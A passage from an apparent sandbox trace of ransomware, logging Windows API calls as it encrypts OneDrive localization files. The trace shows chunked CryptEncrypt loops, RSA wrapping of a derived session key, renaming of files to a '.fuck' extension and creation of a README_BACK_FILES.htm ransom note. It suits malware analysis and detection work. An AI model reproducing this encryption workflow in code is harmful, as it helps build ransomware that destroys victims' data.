lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.492] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.492] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.492] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.492] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.492] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.492] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.493] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.493] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.493] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.493] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.493] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.493] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.493] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.493] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.493] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.493] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.493] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.493] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.494] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.494] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.494] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.494] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.494] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.494] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.494] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.494] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.494] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.494] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.494] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.494] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.495] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.495] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.495] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.495] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.495] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.495] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.495] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.495] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.495] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.495] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0xd0, lpOverlapped=0x0) returned 1 [0279.495] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0xd0, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0xe0) returned 1 [0279.495] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0xe0, lpOverlapped=0x0) returned 1 [0279.496] CloseHandle (hObject=0x5d48) returned 1 [0279.496] CloseHandle (hObject=0x5d3c) returned 1 [0279.496] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kok\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kok\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kok\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kok\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0279.503] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kok\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0279.503] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kok\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kok\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0279.506] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kok\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kok\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kok\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kok\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0279.508] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0279.508] CryptDestroyKey (hKey=0x2fb688) returned 1 [0279.508] CryptReleaseContext (hProv=0x2f2ddf8, dwFlags=0x0) returned 1 [0279.508] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0279.508] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0279.508] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kok\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kok\\readme_back_files.htm")) returned 0xffffffff [0279.508] AreFileApisANSI () returned 1 [0279.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0279.508] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kok\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kok\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0279.509] GetFileType (hFile=0x5d4c) returned 0x1 [0279.510] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0279.511] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0279.511] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0279.511] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0279.511] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0279.511] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0279.511] GetLastError () returned 0x0 [0279.511] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ku-arab\\filesync.localizedresources.dll.mui")) returned 0x20 [0279.512] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0279.512] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ku-arab\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0279.513] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ku-arab\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0279.619] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0279.620] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2e0a0) returned 1 [0279.630] CryptCreateHash (in: hProv=0x2f2e0a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0279.631] lstrlenA (lpString="gkdJXzAzHsZgjyaYXoQmaXsDzMlQm") returned 29 [0279.631] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0279.631] CryptDeriveKey (in: hProv=0x2f2e0a0, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0279.683] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0279.683] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0279.683] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1e448) returned 1 [0279.684] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1e448, dwCertEncodingType=0x1, pInfo=0x2f36390*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f363c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f363c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbcc8) returned 1 [0279.686] CryptEncrypt (in: hKey=0x2fbcc8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0279.686] CryptEncrypt (in: hKey=0x2fbcc8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1e3c0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1e3c0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0279.687] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f1e3c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1e3c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0279.688] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.690] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.690] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.741] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.742] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.742] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.742] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.742] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.742] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.742] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.743] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.743] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.743] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.743] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.743] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.743] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.743] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.743] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.743] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.743] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.743] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.743] ReadFile 